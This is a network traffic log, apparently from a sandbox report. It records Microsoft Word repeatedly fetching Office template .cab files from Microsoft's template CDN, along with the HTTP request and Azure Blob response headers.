Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC499632D1A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 009251c0-b01e-0139-0e97-a03e98000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 01a9fe93-e01e-0020-0397-a0f18d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC4998BC504
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76eac56c-801e-00f9-0d97-a0f289000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f32060e3-b01e-0002-5297-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp1000111502.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
Last-Modified: Thu, 12 Jul 2018 00:23:53 GMT
ETag: 0x8D5E78DBFB34F04
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d4301c61-b01e-0122-6697-a0b138000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499FED5FF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dacba60e-401e-0105-7097-a08a43000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 15:41:39 GMT
ETag: 0x8D36AC498BB27EF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7e33-b01e-0050-7d97-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC88357BC32
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f320610a-b01e-0002-7697-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 050425c3-601e-0131-1e97-a09534000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC16D93762
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6b95f26a-601e-0143-7d97-a0927b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
ETag: 0x8D36AC4A3175138
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03998158.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IaS3txYxwszaX7umN1Hw0g==
Last-Modified: Fri, 22 Apr 2016 15:41:55 GMT
ETag: 0x8D36AC4A24B210A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: da46b32d-701e-0081-5997-a09a3e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC8865F4922
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428ca131-801e-0139-0397-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC8987823BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45ea03cb-501e-000a-5e97-a02e9d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
ETag: 0x8D36AC886C4C4EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621faa23-601e-00ca-3c97-a0d6a3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
ETag: 0x8D60DDB7EAA50F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ceee4029-b01e-00bb-2c97-a03088000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8871139C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19a4ffc9-101e-0104-2197-a0f920000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8875AEF5A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f99a54d-f01e-011c-6c97-a02647000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.23:443RequestGET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
